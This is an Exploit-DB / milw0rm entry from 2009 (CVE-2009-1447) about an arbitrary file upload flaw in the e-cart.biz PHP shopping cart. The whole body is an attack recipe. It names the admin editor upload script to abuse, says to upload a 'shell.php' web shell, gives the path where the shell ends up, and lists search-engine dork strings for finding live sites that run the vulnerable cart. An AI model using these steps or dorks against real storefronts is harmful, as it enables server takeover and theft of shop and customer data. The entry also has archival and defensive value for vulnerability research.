e-cart.biz Shopping Cart Arbitrary File Upload Vulnerability

2009-04-17T00:00:00
ID EDB-ID:8474
Type exploitdb
Reporter ahmadbady
Modified 2009-04-17T00:00:00

Description

e-cart.biz Shopping Cart Arbitrary File Upload Vulnerability. CVE-2009-1447. Webapps exploit for php platform

                                        
                                                            =-=-Remote Arbitrary File Upload-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=
script::e-cart Shopping Carts
-------------------------------------------------
Author: ahmadbady

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
download from:http://www.e-cart.biz/e-cart_Free.zip

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
upload:
/path/admin/editor/image.php --> upload shell.php

shell.php ---> /path/images/upload/shell.php

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=--=-=-=-=-=-=-

dork:
"Powered by e-cart.biz Shopping Carts & Storefronts"
"Powered by e-cart.biz Shopping Carts"

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2009-04-17]